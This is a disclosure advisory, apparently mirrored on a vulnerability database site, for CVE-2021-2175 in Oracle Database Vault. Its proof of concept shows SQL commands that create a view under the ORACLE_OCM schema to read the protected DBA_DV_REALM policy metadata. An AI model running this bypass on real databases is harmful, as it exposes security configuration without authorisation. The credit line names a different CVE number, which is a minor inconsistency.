Vulners
Lucene search
Oracle Database Vault Metadata Exposure Vulnerability
10
Title: CVE-2021-2175 – Oracle Database Vault Metadata Exposure Vulnerability
Product: Database
Manufacturer: Oracle
Affected Version(s): 12.1.0.2, 12.2.0.1, 18c, 19c
Tested Version(s): 19c
Risk Level: low
Solution Status: Fixed
CVE Reference: CVE-2021-2175
Author of Advisory: Emad Al-Mousa
Overview:
Oracle database vault is a security feature that imposes segregation of duties such as account managemenet, authorization,....etc. So, in a nutshell a DBA/System Admin with access to "SYS" user has limited power in terms of data viewership, account creation,.....etc. The powers of SYS account are stripped down.
*****************************************
Vulnerability Details:
Vulnerability in the Database Vault component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having Create Any View, Select Any View privilege with network access via Oracle Net to compromise Database Vault. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Database Vault accessible data [Meta-data].
*****************************************
Proof of Concept (PoC):
The DBA_DV_REALM data dictionary view lists the realms (security policies configured for data protection) created in the current database instance, such information SYS user by default has NO ACCESS to since it exposes what security measures of data protection is configured.
Access the database as SYS account:
sqlplus / as sysdba
SQL> SELECT * FROM DBA_DV_REALM;
ERROR at line 1:
ORA-01031: insufficient privileges
// as expected SYS account can't view the database view contents.....However...let us do the following:
SQL> create view ORACLE_OCM.DUMMY_V as select * from DBA_DV_REALM;
SQL> select * from ORACLE_OCM.DUMMY_V;
// ORACLE_OCM account is misconfigured and was granted extra access to the view so when you create the view under it....you will be access the view content....and now you can see/view the vault realm policies are configured to protect what exactly within the database system.
*****************************************
References:
https://www.oracle.com/security-alerts/cpuapr2021.html
https://databasesecurityninja.wordpress.com/2022/02/02/cve-2021-2175-database-vault-metadata-exposure-vulnerability/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-2175
Credit:
Emad Al-Mousa: CVE-2021-35576
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Jan 2023 00:00Current
4Medium risk
Vulners AI Score4
CVSS 3.12.7
CVSS 24
EPSS0.00753
SSVC